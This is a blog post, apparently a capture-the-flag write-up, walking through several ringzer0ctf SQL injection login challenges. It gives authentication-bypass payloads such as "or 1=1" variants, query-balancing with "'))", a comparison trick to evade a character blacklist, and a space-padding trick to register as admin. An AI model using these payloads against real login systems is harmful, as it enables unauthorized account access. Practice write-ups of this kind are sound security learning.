🔐
EAkl Blog
  • 👋Welcome!
  • 🐛Web Application Findings
    • Cisco BroadWorks Vulnerabilities CVE-2021–34785 & CVE-2021–34786
    • Authentication bypass using empty parameters.
    • IDOR at Login function leads to leak user’s PII data
  • ℹ️Recon automation, tips and tricks
    • Simple Recon Methodology
    • How to write a simple script to automate finding bugs
  • 🔐Hack The Box Machines
    • Feline Walkthrough
    • Reel2 Walkthrough
    • Active Walkthrough
    • PopCorn Walkthrough
    • Jewel Walkthrough
    • Passage Walkthrough
    • Time Walkthrough
    • Devel Walkthrough
    • Lame Walkthrough
    • Beep Walkthrough
    • Blue Walkthrough
    • Jerry Walkthrough
    • Optimum Walkthrough
    • Grandpa Walkthrough
    • Legacy Walkthrough
    • Mirai Walkthrough
    • Valentine Walkthrough
    • Shocker Walkthrough
    • Netmon Walkthrough
    • Bank Walkthrough
    • Granny Walkthrough
    • Tabby Walkthrough
    • Access Walkthrough
    • Swagshop Walkthrough
    • OpenAdmin Walkthrough
    • Remote Walkthrough
    • Sauna Walkthrough
    • FriendZone Walkthrough
    • Hack The Box — Networked
    • Hack The Box — Forest
    • Hack The Box — WriteUP
    • Hack The Box — Academy
    • Hack The Box — Luanne
  • 🏴‍☠️CTF Challenges
    • CTF CyberTalents  — Bypass the world Writeup
    • CTF CyberTalents — Admin Gate First
    • CTF CyberTalents — Inbox
    • CTFlearn — Inj3ction Time
    • CTF ringzer0ctf — Challenge Access List
    • CTF ringzer0ctf — Login portal 2
    • CTF ringzer0ctf — SQLi challenges — part 1
    • CTF ringZer0ctf — Login form
  • 🔴Red Teaming Tips & Tricks
    • MOTW Defensive and Bypass techniques
  • ☁️Cloud Security
    • [Azure] Real Example to know different types of app concepts in Azure
    • [Azure] What To Do If?
Powered by GitBook
On this page
  1. CTF Challenges

CTF ringzer0ctf — SQLi challenges — part 1

PreviousCTF ringzer0ctf — Login portal 2NextCTF ringZer0ctf — Login form

Last updated 2 years ago

All Right! Here we’ll deep into the most interesting vulnerability for me, it’s a SQL injection ❤

CTF ringzer0ctf — SQLi challenges — part 1

All Right! Here we’ll deep into the most interesting vulnerability for me, it’s a SQL injection ❤

Let’s solve some CTF challenges about this topic from website.

From it’s name it seems that it’s the easiest way to solve sqli challenge, you will found a login form and the first try is to inject this payload

admin’ or 1=1 #

Good, it’s worked ! You have the flag and congrats to the first point ❤

Here the situation is different little because you have two forms, the first one is login form and the second is registration form. If you tried to register an account with username:admin you will have a message that this account is already exist so try to login into it with our simple trick

username: admin & password: aykalam’ or 1=1#

but unfortunately you will get an error message, you failed to login with this trick and i tried more than trick but it doesn’t work

Now we don’t have any way from creating account with username admin.

After tried more and more and searching I've found something tricky, try to register an account with this credentials

username: — — admin — — &password=anything_you_want

Note: The — character is spaces.

By adding for example 4 spaces before and after the username it will pass the validation and will be deleted into the system or the database so you will bypass the validation and register with admin username, the password any word you want

Now try to login again

FLaaaaaaaaG :) Congratulation for the points ❤

If you logged into this challenge you’ll get a login page which by default you’ll use the simple technique by inject ‘ (comma) in the username filed to notice the balance the query in the backend, for example the backend balance the query bu inserting ‘ or “ or ‘) or “) or nothing, and so on.

By inserting ‘ you will get some thing nice, an error message which demonstrate the balancing query method, Nice :)

From the screenshot and the error the backend balancing the query by ending the query with ‘) characters so we’ll try to inject it with our payload, but wait and see the error again

You’ll have inserting 2 ) because there’s one in the start which need to be closed so the balancing here is ‘)) not ‘)

username: admin’)) —

Good! We got it !

After going into the challenge you will see another … what !! login page again !!

so let’s deal with it by the default payload ‘ and there’s no error messages appear !

try to inject this payload → admin ‘ or 1=1 # and you will see this message Illegal characters detected.

Nice, so the system has validated my input and have a black list to some charachters like # and =

so we will try to find alternative for this char

you can use > or < instead of = in this way

username: admin’ or ‘a’>’b

trying this method…

We have 2 points NOW, Good !

Challenge 1 — 

Challenge 2 — 

Challenge 3 — 

Challenge 4 — 

Fu*$^& login form again

from this list . you will find more than technique to bypass filtered chars

🏴‍☠️
Most basic SQLi pattern.
Random Login Form
Po po po po postgresql
Login portal 1
WAF-GitHub
ringzer0ctf